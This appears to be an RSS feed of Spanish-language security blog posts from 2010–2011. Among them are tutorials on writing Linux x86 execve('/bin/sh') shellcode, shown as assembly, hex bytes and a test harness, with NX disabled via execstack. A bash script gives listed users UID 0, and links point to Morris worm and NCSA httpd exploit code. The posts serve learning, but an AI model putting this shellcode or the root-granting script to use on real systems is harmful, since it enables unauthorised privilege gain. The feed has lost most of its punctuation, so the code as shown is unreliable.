<item><title>Exploit exercises</title><description>Secuobs.com : 2011-11-26 17:09:51 -  Unix   Cisco   Hacks  - http exploit-exercisescom  Ya tengo diversion About Exploit Exercises exploit-exercisescom provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering Nebula takes the participant through a variety of common  and less than common  weaknesses and vulnerabilities in Linux It takes a look at SUID files Permissions Race conditions Shell meta-variables  PATH weaknesses Scripting language weaknesses Binary compilation failures At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible Protostar introduces the following in a friendly way  Network programming Byte order Handling sockets Stack overflows Format strings Heap overflows The above is introduced in a simple way, starting with simple memory corruption and modification, function redirection, and finally executing custom shellcode Address Space Layout Randomisation and Non-Executable memory has been disabled Fusion is the next step from the protostar setup, and covers more advanced styles of exploitation, and covers a variety of anti-exploitation mechanisms such as  Address Space Layout Randomisation Position Independent Executables Non-executable Memory Source Code Fortification  DFORTIFY_SOURCE  Stack Smashing Protection  ProPolice   SSP  In addition to the above, there are a variety of other challenges and things to explore, such as  Cryptographic issues Timing attacks Variety of network protocols  such as Protocol Buffers and Sun RPC  At the end of Fusion, the participant will have a through understanding of exploit prevention strategies, associated weaknesses, various cryptographic weaknesses, numerous heap implementations A disfrutar  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/343927.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/343927.shtml</guid></item>
<item><title> Recuperando  archivos borrados con lsof</title><description>Secuobs.com : 2011-11-24 20:05:48 -  Unix   Cisco   Hacks  - Hola lectores, Puede usarse el mitico lsof para recuperar archivos borrados Por ejemplo, logs borrados en una maquina comprometida que aun estan siendo accedidos por su demonio correspondiente, un servidor Apache, etc En un terminal    echo probando basura7   less basura7 Y dejamos el less con el archivo abierto Entonces en otro terminal    rm basura7   ls basura7  bin ls  basura7  No such file or directory   lsof grep basura7 less 14481 usuario 4r REG 8,1 9 2627682  tmp basura7  deleted    file  proc 14481 fd 4  proc 14481 fd 4  broken symbolic link to  tmp basura7  deleted '   cat  proc 14481 fd 4 probando El primer numero es el PID El segundo el numero de descriptor de fichero donde ese proceso lo tiene abierto Y ahi esta  recuperado   entre comillas porque realmente nunca se borro del disco   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/343719.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/343719.shtml</guid></item>
<item><title>ksh AIX create users</title><description>Secuobs.com : 2011-11-16 16:47:10 -  Unix   Cisco   Hacks  - Hola lectores, Aqui dos scripts tontos en ksh para AIX que acabo de hacer por si le pueden servir a alguien Uno crea todos los usuarios listados en el archivo de texto que se le pasa como argumento al script En cada linea dos columnas, el user seguido del grupo principal al que debe pertenecer El otro es un script expect que asigna una contraseña a los usuarios, pues el comando passwd de este AIX no tiene opcion -stdin 3 Lo aburrido y rutinario es malo  usr bin ksh PERS_HOME home  PASS el_password  PERS_SH usr bin ksh  cat  1    while read USER GROUP do   Si ya existe el user cut -d  -f1  etc passwd  grep  USER    dev null OUT  if    OUT  -eq 0   then echo  2  ERROR  El usuario   USER  ya existe  else useradd -g  GROUP  -m -d  PERS_HOME USER  -s  PERS_SH   USER   passexp  USER   PASS    Forzar usuario a cambiar password en el siguiente inicio de sesion pwdadm -f ADMCHG  USER  fi done passexp   usr bin expect set timeout 7 set USER  lindex  argv 0  set PASS  lindex  argv 1  spawn passwd  USER expect  password  send  PASS r  expect  password    send  PASS n       password again    send  PASS n     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/341008.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/341008.shtml</guid></item>
<item><title>bash create users and make root</title><description>Secuobs.com : 2011-11-15 18:03:36 -  Unix   Cisco   Hacks  - Hola lectores, Aqui dos scripts tontos en bash que acabo de hacer por si le pueden servir a alguien Uno crea todos los usuarios listados en el archivo de texto que se le pasa como argumento al script El otro hace root a los usuarios definidos en el archivo de texto que tambien se pasa como argumento 3 Lo aburrido y rutinario es malo  bin bash   create_userssh v 01   vlan7   15-Nov-2011   Crea users pasados en argumento como archivo de texto, un user por linea   hay que ser root if    EUID -ne 0   then echo  Este script solo puede ejecutarlo root  1 2 exit 1 fi   vars PERS_HOME home  PERS_SH bin bash  PASS el_password    hay argumento      -eq 0       echo  2 ERROR  Debe introducir como argumento un txt con usuarios, uno por linea   exit 1      file exists    -f  1       echo  2 ERROR  El archivo pasado como argumento no existe   exit 1    NOW date  pourcentsY-pourcentsm-pourcentsd-pourcentsX  HOSTNAME hostname  LOGFILE create_users_log- HOSTNAME- NOWlog  TEMP_FILE mktemp    remove duplicates   blank lines awk '  x 0 '  1  grep -v ' '  TEMP_FILE for user in  cat  TEMP_FILE  do   Si ya existe el user cut -d  -f1  etc passwd  grep  user    dev null OUT  if    OUT -eq 0  then echo  2  ERROR  El usuario   user  ya existe  echo  2  ERROR  El usuario   user  ya existe    LOGFILE  else   Creamos nuevo user  usr sbin useradd -d  PERS_HOME user  -s  PERS_SH  -m  user    Asignamos passwd -e fuerza cambio al primer logeo echo  PASS  passwd -e --stdin  user   grabamos user pass en log echo -e  user t PASS   LOGFILE  echo  El usuario  user  ha sido creado y su password es   PASS  fi done  bin bash   mod_userssh v01   vlan7   15-Nov-2011   Modifica users pasados en argumento como archivo de texto para que tengan UID 0   hay que ser root if    EUID -ne 0   then echo  Este script solo puede ejecutarlo root  1 2 exit 1 fi   hay argumento      -eq 0       echo  2 ERROR  Debe introducir como argumento un txt con usuarios, uno por linea   exit 1      file exists    -f  1       echo  2 ERROR  El archivo pasado como argumento no existe   exit 1    NOW date  pourcentsY-pourcentsm-pourcentsd-pourcentsX  HOSTNAME hostname  LOGFILE mod_users_log- HOSTNAME- NOWlog  TEMP_FILE mktemp    remove duplicates   blank lines awk '  x 0 '  1  grep -v ' '  TEMP_FILE for user in  cat  TEMP_FILE  do   Si no existe el user cut -d  -f1  etc passwd  grep  user    dev null CAMPO1  cut -d  -f3  etc passwd  grep  user    dev null CAMPO3  if    CAMPO1 -ne 0 -o  CAMPO3 -ne 0  then echo  2  ERROR  El usuario   user  no existe o ya es root  echo  2  ERROR  El usuario   user  no existe o ya es root    LOGFILE  else   Hacemos root al user  usr sbin usermod -u 0 --non-unique  user    grabamos user en log echo  user ahora es root    LOGFILE  echo  El usuario  user  ha sido hecho root  fi done Igual le sirven a alguien  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/340787.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/340787.shtml</guid></item>
<item><title>Fascinacion por los aparatos</title><description>Secuobs.com : 2011-10-29 01:27:39 -  Unix   Cisco   Hacks  -  IMAGE Yo llegue a usar precisamente este terminal tonto VT220 Estuvo en el A2 de la FIB de la UPC hasta que retiraron los VTxxx Estaba alimentado solo por una pila  un hack es eso  Con ese terminal conectaba contra alguno de los dos VAX que estaban en cluster, un 8600 que entro en la FIB el año 1986 y compartia 6 discos con otro VAX 785 de tal forma que no se duplicaba el SW y se garantizaba la consistencia de los datos almacenados Como se compartian los datos se podia trabajar indistintamente, bajo autorizacion, en el 8600 o en el 785 El LCFIB  Laboratori de Calcul de la Facultat d'Informatica de Barcelona  bautizo ese cluster con el nombre de  ISIS , y los hostnames eran chooyu o meiga Me gustaba Opera en plena guerra Netscape   IE, pero en los terminales tontos tenia que navegar con Lynx, conectaba por telnet a MUDs  juegos de rol en modo texto al estilo de las viejas aventuras conversacionales  como Medina en la direccion nescafibupces en no recuerdo que puerto El Medina fue hecho por algunos colgados de la FIB, y no era mas que un fork de uno ingles  Aurora creo  y creo que fue el primer MUD en castellano En el Medina matabas a profesores de entonces por el campus, etc  la LOPD nunca se metio con nosotros por meter nombres y apellidos de profesores  Podias hacer grupos con gente que se conectaba de otras universidades y corrias el riesgo de que el operador  el becario encargado  te hiciera un  disuser   lo habitual era una semana sin cuenta  si te pillaban Incluso consegui un cliente de IRC para VMS, no recuerdo ni de donde En los 90 Telefonica  Infovia  no estaba al alcance de muchos y la tarifa plana era una utopia  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/337549.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/337549.shtml</guid></item>
<item><title>Exploiting para niños Protecciones implementadas por el SO La historia</title><description>Secuobs.com : 2011-09-22 21:04:49 -  Unix   Cisco   Hacks  - Hola lectores, Estoy escribiendo un documento sobre la historia de las protecciones implementadas por el SO a los buffer overlows Es aun un borrador y puede encontrarse el WIP en la wiki de shellcoding en la direccion Exploiting para niños Protecciones implementadas por el SO La historia Mi idea es crear un documento con cierta perspectiva historica sobre las protecciones contra buffer overflows implementadas por el SO mas que crear un documento tecnico, de ahi el nombre La wiki ha sido remodelada, aunque no quiero dedicar demasiado tiempo pues no soy diseñador Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/330446.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/330446.shtml</guid></item>
<item><title>bot irc en python que dice titulos de youtubes que escriben los users</title><description>Secuobs.com : 2011-08-26 17:14:32 -  Unix   Cisco   Hacks  - Hola lectores, Hace poco mas de un año hice un bot irc en bash programado para decir los titulos de los youtubes que escribian por el general de un canal de irc sus usuarios Hoy comparto con vosotros un bot irc codificado en python por mi amigo vermells Es un colega que anda dandole a diversos lenguajes de programacion, sobre todo C y python, y python es el lenguaje en que mas comodo se siente Esta probado tanto en Linux como windows Ahi va  import socket, string, urllib2  Programa que crea un bot para el IRC def formateo cadena  cont   0 cadena cadena ' ' lista  while cont  len cadena  if cadena cont ' '  while cadena cont ' '  cont 1 else  listaappend cadena cont  cont 1 while ' ' in lista  del lista listaindex ' '  title stringjoin lista  socket_botsend 'PRIVMSG ' canal '  ' ' x0300,10' title ' n'  botnick    Manolo333  server    lunairc-hispanoorg  puerto   6667 canal    canal  cont 1 f   open logtxt ,  w  socket_bot   socketsocket  socket_botconnect server, puerto  socket_botsend 'USER bobo bubu bibi  amateur n'  socket_botsend 'NICK '  botnick ' n'  while True  line   socket_botrecv 4096  print line if linefind 'PING' -1  socket_botsend 'PONG '  linesplit 1 ' r n'   socket_botsend JOIN    canal ' n'          fwrite line  cont cont 1 if cont 1000  print  se cerrara el archivo  fclose  socket_botclose  if linefind 'youtubecom'    -1  tmp   linesplit  tmp   tmppop  title   tmp 1  try  url   urllib2urlopen title  while True  html   urlreadline  if htmlfind ' '    -1  formateo html  html   urlreadline  break except  continue Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/325409.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/325409.shtml</guid></item>
<item><title>The smallest Linux ELF binary to print 'Hello world '  58 bytes </title><description>Secuobs.com : 2011-07-09 13:21:54 -  Unix   Cisco   Hacks  - BITS 32 ORG 0 DB 0x7F entry  inc ebp dec esp inc esi mov dl, 14 mov cl, hello xor dword  ecx , 0x6C4D6549 inc ebx push dword 0x00030002 mov al, 4 int 0x80 add  eax , eax add  eax , al sbb  eax , al add  eax , al sbb  eax , al add  eax , al xchg eax, esi dec ebx int 0x80 DD 0x00210000-0x18 hello  DD 0x00210001 DB 'o, world ', 10 nasm -f bin -o tiny-hellobin tiny-helloasm   chmod  x tiny-hellobin Fuente  http dhatenanejp kikx 20061111 Si encuentras algo mejor, dimelo Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/316047.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/316047.shtml</guid></item>
<item><title>Local Linux x86 Shellcoding without any high-level language</title><description>Secuobs.com : 2011-05-14 19:02:41 -  Unix   Cisco   Hacks  - Video complementario al primer numero de las ASM Shellcoding series Musica  La perrera - Carne de perro  instrumental   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/304868.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/304868.shtml</guid></item>
<item><title>Scapy fools nmap</title><description>Secuobs.com : 2011-05-07 02:08:25 -  Unix   Cisco   Hacks  -     Que puerto esta realmente abierto   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/303198.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/303198.shtml</guid></item>
<item><title>scapy 3-way TCP IP handshake</title><description>Secuobs.com : 2011-05-07 01:23:12 -  Unix   Cisco   Hacks  -    Como podeis comprobar, o se ve a pantalla completa o no se distingue nada  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/303195.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/303195.shtml</guid></item>
<item><title>evilbs backdoor</title><description>Secuobs.com : 2011-05-06 19:02:12 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/303134.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/303134.shtml</guid></item>
<item><title>ASLR bypass Linux x86 ret2eax</title><description>Secuobs.com : 2011-04-24 17:15:19 -  Unix   Cisco   Hacks  - http wwwyoutubecom watch v ViMY9Ly52aY  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/300486.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/300486.shtml</guid></item>
<item><title>wiki de shellcoding remodelada</title><description>Secuobs.com : 2011-04-05 06:26:16 -  Unix   Cisco   Hacks  - Daily news  Daily news  http zen7vlan7org  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/296253.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/296253.shtml</guid></item>
<item><title>Overflowed Minds</title><description>Secuobs.com : 2011-03-31 17:23:33 -  Unix   Cisco   Hacks  - Aupa  NewLog y yo estamos llevando a cabo un proyecto de shellcoding y explotación de software, una comunidad que intenta ser un vestigio de épocas pasadas, dónde lammers y script-kiddies aun no existían, dónde el primer objetivo de las personas era aprender y descubrir, dónde el afán por compartir y enseñar superaban, sin lugar a dudas, el propio ego Podéis encontrarnos en la red en la URL http wwwoverflowedmindsnet Por el momento disponemos de contenido propio en la sección Papers Estos son    Introducción a la explotación de software en sistemas Linux   Local Linux x86 Shellcoding without any high-level language   Bypassing local Linux x86 ASLR protection Disponemos además de un foro en el que parece que comienza a haber cierta actividad, debido, en gran parte, a los blogs que nos han apoyado haciendonos una reseña Gracias  En lo que respecta a las demás secciones de la página, esperamos llegar a desarrollar algo suficientemente bueno Aunque quizás quieras ser tú el primero, así que invitamos a leer el CFH  Call For Hackers  a toda aquella persona que desee colaborar o formar parte de esta comunidad Y, ante todo, sed bienvenidos a Overflowed Minds  Referencias  agradecimientos vamos    Un informático en el lado del mal  Overflowed minds  Aprendiendo a hacer exploits   Overflowed Minds, recursos para la seguridad informática  CyberHades  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/295413.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/295413.shtml</guid></item>
<item><title>ASM   Shellcoding Series II</title><description>Secuobs.com : 2011-02-27 16:51:18 -  Unix   Cisco   Hacks  - 0x02_bypassing_local_Linux_x86_ASLR_protectionpdf Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/288050.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/288050.shtml</guid></item>
<item><title>metasploit</title><description>Secuobs.com : 2011-01-31 23:33:02 -  Unix   Cisco   Hacks  -     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/281969.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/281969.shtml</guid></item>
<item><title>La nana del buffer overflow como arte, hacking o asi-empezo-todo</title><description>Secuobs.com : 2011-01-24 19:20:23 -  Unix   Cisco   Hacks  -    worm-srctargz   El codigo fuente del gusano de Morris Es la primera explotacion de un buffer overflow conocida  entre otras muchas cosas que ingeniosamente atacaba el worm  Los comentarios de algunos codigos son buenos, muy buenos 1011384083pdf   Un analisis del gusano de Morris, por los hackers del MIT Salio en 1989, a los 3 meses del ataque ncsahttpdexploitc   Y aqui tenemos un exploit del segundo BoF de la historia La shellcode esta hecha al modo como explicó Mudge en el primer texto sobre shellcoding publicado El codigo esta  overbloated  ncsa1-3c   Una version  hack the hack  del exploit original del BoF en NCSA httpd 13 Esta hecha a la manera en que lo explica Aleph1 en el mitico articulo de la Phrack que todos conocemos  I hope I managed to prove that exploiting buffer overflows should be an art  Solar Designer  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/280375.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/280375.shtml</guid></item>
<item><title>Malware en PDF</title><description>Secuobs.com : 2011-01-17 18:06:02 -  Unix   Cisco   Hacks  - Mientras preparo el proximo numero de las ASM Shellcoding series, como esto lleva tiempo sin actualizar pongo a continuacion algunos de los enlaces que me han parecido mas interesantes del malware en PDF, aunque la tendencia es que vaya ganando terrero el malware en Java Sandboxes  http sourceforgenet projects zerowine-tryout  - VM http mwanalysisorg  - online Herramientas  http jsunpackjeekorg http esec-labsogeticom dotclear indexphp pages Origami - Muy bueno, con muchos scripts en ruby listos para experimentar http malzillasourceforgenet downloadshtml Distros  http zeltsercom remnux  Textos  http grey-cornerblogspotcom search label maliciouspourcents20pdf http contagiodumpblogspotcom http extraexploitblogspotcom  http zeltsercom combating-malicious-software indexhtml El ultimo CVE 0day en malware en PDF  http seclistsorg fulldisclosure 2010 Nov 23 http jsunpackjeekorg dec go report b792fac9b11b08e874a5d274741d201aeeef9016 - pdf original http jsunpackjeekorg dec go report cd93a124369bfdc7260178c55028b140cb59cc0f - Descomprimido con pdftk Mola de jsunpack que puedes buscar por hash MD5 del archivo y te permite bajarte lo que  ve   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/278720.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/278720.shtml</guid></item>
<item><title>Publicar webs en la lista negra de facebook</title><description>Secuobs.com : 2011-01-17 18:06:02 -  Unix   Cisco   Hacks  - Esta entrada es chorras, pero a mi me sirve Me banearon este blog OO URL shortener de google Suerte,  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/278719.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/278719.shtml</guid></item>
<item><title>ASM   Shellcoding Series I</title><description>Secuobs.com : 2010-11-23 15:05:26 -  Unix   Cisco   Hacks  - 0x01_Local_Linux_x86_Shellcoding_without_any_high-level_languagepdf Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/266891.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/266891.shtml</guid></item>
<item><title>Creando shellcodes  position independent </title><description>Secuobs.com : 2010-10-27 07:52:32 -  Unix   Cisco   Hacks  - Hay un concepto en ASM shellcoding llamado  position independent  Si en una shellcode hacemos un push sh , nasm coloca en la pila la direccion de la cadena, pero con una peculiaridad importante Houston, tenemos un problema resulta que cualquier ensamblador, nasm tambien, coloca en la pila la direccion calculada por el ensamblador de manera estatica, en lugar de la direccion de memoria de la cadena, que es lo que queremos Para ilustrarlo, a continuacion muestro un ejemplo de una shellcode _mal hecha_ por este motivo  BITS 32  int execve const char  filename, char  const argv , char  const envp  xor eax, eaxcdq  edx envppush edx  terminamos cadena de filename y el array argvpush sh    MAL  Solo se hace un push de la direccion de la cadenamov ebx,  esp   ebx direccion de la cadenamov ecx, esp  ecx direccion del puntero a la cadenamov al, 11  execve es la syscall 11int 0x80sh db  bin sh  Profundicemos en el push sh, que si no nos fijamos bien podemos malinterpretar lo que realmente hace No es position independent Adjunto un log de NewLog con gdb que lo demuestra   gdb  n7 push edx  terminamos cadena de filename y el array argv gdb  n8 push sh  push de cadena  bin sh en la pila  ojo  el comentario esta mal gdb  n9 mov ebx,  esp   ebx direccion de la cadena gdb  print  esp 2    void   0xbf914598 gdb  x 4x 0xbf9145980xbf914598  0x08048072 0x00000000 0x00000001 0xbf916565 gdb  x s 0x80480720x8048072    bin sh  Citando a NewLog  En el momento en el que muestro esp es cuando se acaba de ejecutar la instrucción push sh Así que miro donde apunta esp y éste apunta a 0xbf914598 Compruebo qué hay en esa dirección y veo que hay otra dirección, la 0x8048072 Miro que hay en esa dirección y voilà, ahí está la cadena  bin sh  Así que como da a entender TuXeD, en ebx no hay la dirección de la cadena  bin sh, sino la dirección del puntero de la cadena  bin sh  o sea, la dirección de la dirección   El problema de hacer un push de la cadena es que no se puede explotar en el mundo real, porque cuando inyectamos una shellcode push sh dentro de otro programa en ejecucion no podemos contar con que se haya colocado en la misma posición que asumio nasm al ensamblar Es decir, una shellcode push sh no es  position independent , y lo solucionamos con una shellcode JMP CALL que sea  position independent , es decir, que sea capaz de obtener la dirección de la cadena  bin sh  independientemente de donde estemos cargados en memoria Ahi va una BITS 32  int execve const char  filename, char  const argv , char  const envp  xor eax, eaxcdq  envp es 0mov al, 11  execve es la syscall 11push edx  terminamos cadena y array argvjmp short down  jmp short   no bytes nulosback mov ebx,  esp   direccion de la cadenamov ecx, esp  direccion del puntero a la cadenaint 0x80down call back  ponemos la cadena  bin sh en la piladb  bin sh  Para terminar, algo basico pero que conviene tener presente  mov ebx,  esp  pone en ebx la direccion de esp como todos sabemos Pero  cual es la direccion de esp en ese momento   Que hay antes de ese mov ebx,  esp    Un call call tiene una  feature , y es que guarda en la pila la direccion de la siguiente instruccion, de tal forma que cuando la subrutina a la que llama finalice con un RET se pueda retornar correctamente a la siguiente instruccion, valga la redundancia Hemos colocado la cadena justo despues de la llamada a call, es por eso que su direccion se coloca en la pila Referencias    Exploitation  Shellcodes en Linux II http securityetaliies 2010 04 21 exploitation-shellcodes-en-linux-ii    Segmentation fault en un codigo ensamblador http wwwwadalbertiaorg foro viewtopicphp f 6 t 6048  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/260210.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/260210.shtml</guid></item>
<item><title>shellcoding A vueltas con el flag NX</title><description>Secuobs.com : 2010-10-27 07:52:32 -  Unix   Cisco   Hacks  - NX es una proteccion contra la explotacion de vulnerabilidades, tipicamente buffer overflows, heap overflows y demas hierbas, cuya defensa se basa en impedir que se ejecute codigo en regiones no ejecutables de la memoria A saber  la pila, el heap y  la seccion data  No, la seccion data no realmente   Veamos si tenemos NX habilitado de forma global en Ubuntu o no Podemos comprobarlo mirando en el archivo  proc cpuinfo Segun documentacion oficial en la primera linea de flags aparecera nx si la BIOS no esta deshabilitando NX  siempre que la CPU lo soporte  Casi todas las CPUs x64 soportan NX Y las de 32 bits, si usan PAE seguramente soporten NX vlan7 vlan7-ubuntu  grep  flags  proc cpuinfo head -n1 grep nxflags   fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc up rep_good nonstop_tsc extd_apicid pni monitor cx16 popcnt lahf_lm svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdtvlan7 vlan7-ubuntu  Por ahi aparece el flag NX, lo que indica que en mi Ubuntu Lucid estoy usando NX Tambien comentar que a partir de Ubuntu 1004 podemos ver si la BIOS esta deshabilitando NX o no mediante el siguiente comando  vlan7 vlan7-ubuntu   usr bin check-bios-nx --verboseThis CPU has nx in the flags, so the BIOS is not disabling itvlan7 vlan7-ubuntu  Podemos desactivar el flag NX pasandole el parametro -s a la herramienta execstack, que se encuentra en los repositorios de debian ubuntu dentro del paquete prelink sudo aptitude install prelink Si no queremos instalar el paquete, podemos hacerlo con ld -z noexecstack Mark executable as not requiring executable stack Vamos a por una shellcode vlan7 vlan7-ubuntu  nasm -f elf32 scasmvlan7 vlan7-ubuntu  objdump -d sco sco  file format elf32-i386 Disassembly of section text  00000000 _start  0  eb 14 jmp 16 00000002   2  5b pop pourcentsebx 3  31 c0 xor pourcentseax,pourcentseax 5  99 cltd 6  88 43 07 mov pourcentsal,0x7 pourcentsebx  9  89 5b 08 mov pourcentsebx,0x8 pourcentsebx  c  88 43 0c mov pourcentsal,0xc pourcentsebx  f  8d 4b 08 lea 0x8 pourcentsebx ,pourcentsecx 12  b0 0b mov  0xb,pourcentsal 14  cd 80 int  0x80 00000016   16  e8 e7 ff ff ff call 2 1b  2f das 1c  62 69 6e bound pourcentsebp,0x6e pourcentsecx  1f  2f das 20  73 68 jae 8a vlan7 vlan7-ubuntu  objdump -d  sco grep ' 0-9a-f ' grep -v 'file' cut -f2 -d  cut -f1-6 -d' ' tr -s ' ' tr ' t' ' ' sed 's   g' sed 's   x g' paste -d '' -s sed 's ' sed 's g' xeb x14 x5b x31 xc0 x99 x88 x43 x07 x89 x5b x08 x88 x43 x0c x8d x4b x08 xb0 x0b xcd x80 xe8 xe7 xff xff xff x2f x62 x69 x6e x2f x73 x68 vlan7 vlan7-ubuntu  cat sc7c char sc     xeb x14 x5b x31 xc0 x99 x88 x43 x07 x89 x5b x08 x88 x43 x0c x8d x4b x08 xb0 x0b xcd x80 xe8 xe7 xff xff xff x2f x62 x69 x6e x2f x73 x68  typedef void  f  int main  f func  func    f sc  func  return 0 vlan7 vlan7-ubuntu  gcc -o sc7 sc7c vlan7 vlan7-ubuntu   sc7 Fallo de segmentaciónvlan7 vlan7-ubuntu  execstack -s sc7vlan7 vlan7-ubuntu   sc7  Ahi tenemos la shell   Referencias   Segmentation fault en un codigo ensamblador http wwwwadalbertiaorg foro viewtopicphp f 6 t 6048   http wwwtenoukcom Module000linuxgas2html   https wikiubuntucom Security CPUFeatures  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/260209.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/260209.shtml</guid></item>
<item><title>Shellcoding sin gcc, solo con nasm ld</title><description>Secuobs.com : 2010-10-27 05:56:05 -  Unix   Cisco   Hacks  - Para empezar veamos la shellcode root bt  cat shellasmBITS 32 section dataglobal _start _start  jmp short downjmp_back  pop ebx   ebx   direccion de la cadena xor eax, eax mov byte  ebx 7 , al   Ponemos un null en N , es decir, shell 7  mov  ebx 8 , ebx   ponemos la direccion de la cadena  en ebx  en shell 8  mov  ebx 12 , eax   null en shell 12  la cadena en este momento es asi   bin sh 0 ebx 0000  que es lo que queremos xor eax, eax mov byte al, 11   execve es syscall 11 lea ecx,  ebx 8    ecx   direccion de XXXX    ebx  lea edx,  ebx 12    edx   direccion de YYYY    0000  int 0x80   llamamos al kerneldown  call jmp_backshell  db  bin shNXXXXYYYY  Ahora compilamos, linkamos y ejecutamos  root bt  nasm -g -f elf32 shellasm -o shelloroot bt  ld shello -o shellroot bt   shellsh-32  iduid 0 root  gid 0 root  groups 0 root ,4 adm ,20 dialout ,24 cdrom ,46 plugdev ,110 lpadmin ,111 sambashare ,112 admin  Ahi tenemos la shell Vamos ahora a mostrar las secciones del programa, y comprobaremos como db esta en la seccion data root bt  objdump -x shell shell  file format elf32-i386shellarchitecture  i386, flags 0x00000112 EXEC_P, HAS_SYMS, D_PAGEDstart address 0x08049054 Program Header  LOAD off 0x00000000 vaddr 0x08049000 paddr 0x08049000 align 2 12 filesz 0x00000083 memsz 0x00000083 flags rw- Sections Idx Name Size VMA LMA File off Algn 0 data 0000002f 08049054 08049054 00000054 2 2 CONTENTS, ALLOC, LOAD, DATA 1 stabstr 00000001 00000000 00000000 00000084 2 2 CONTENTS, READONLY, DEBUGGING 2 comment 0000001f 00000000 00000000 00000085 2 0 CONTENTS, READONLYSYMBOL TABLE 08049054 l d data 00000000 data00000000 l d stabstr 00000000 stabstr00000000 l d comment 00000000 comment00000000 l df  ABS  00000000 shellasm08049056 l data 00000000 jmp_back0804906e l data 00000000 down08049073 l O data 00000001 shell08049054 g data 00000000 _start08049083 g  ABS  00000000 __bss_start08049083 g  ABS  00000000 _edata08049084 g  ABS  00000000 _end root bt  Vale, la cadena de la shell esta en la seccion data como muestro a continuacion 08049073 l O data 00000001 shell Veamos los permisos de la seccion data   Sections Idx Name Size VMA LMA File off Algn 0 data 0000002f 08049054 08049054 00000054 2 2 CONTENTS, ALLOC, LOAD, DATA La seccion data no esta marcada READONLY  Luego podemos escribir  Por ultimo, desensamblamos para comprobar que la shellcode no tiene ningun byte nulo  root bt  rm shell shelloroot bt  nasm -f elf32 shellasm -o shelloroot bt  ld shello -o shellroot bt  objdump -D shell shell  file format elf32-i386 Disassembly of section data  08049054 _start 8049054  eb 18 jmp 804906e 08049056  8049056  5b pop pourcentsebx8049057  31 c0 xor pourcentseax,pourcentseax8049059  88 43 07 mov pourcentsal,0x7 pourcentsebx 804905c  89 5b 08 mov pourcentsebx,0x8 pourcentsebx 804905f  89 43 0c mov pourcentseax,0xc pourcentsebx 8049062  31 c0 xor pourcentseax,pourcentseax8049064  b0 0b mov  0xb,pourcentsal8049066  8d 4b 08 lea 0x8 pourcentsebx ,pourcentsecx8049069  8d 53 0c lea 0xc pourcentsebx ,pourcentsedx804906c  cd 80 int  0x80 0804906e  804906e  e8 e3 ff ff ff call 8049056 08049073  8049073  2f das8049074  62 69 6e bound pourcentsebp,0x6e pourcentsecx 8049077  2f das8049078  73 68 jae 80490e2 _end 0x5e804907a  4e dec pourcentsesi804907b  58 pop pourcentseax804907c  58 pop pourcentseax804907d  58 pop pourcentseax804907e  58 pop pourcentseax804907f  59 pop pourcentsecx8049080  59 pop pourcentsecx8049081  59 pop pourcentsecx8049082  59 pop pourcentsecxroot bt  Referencias    Segmentation fault en un codigo ensamblador http wwwwadalbertiaorg foro viewtopicphp f 6 t 6048  IMAGE   IMAGE   IMAGE  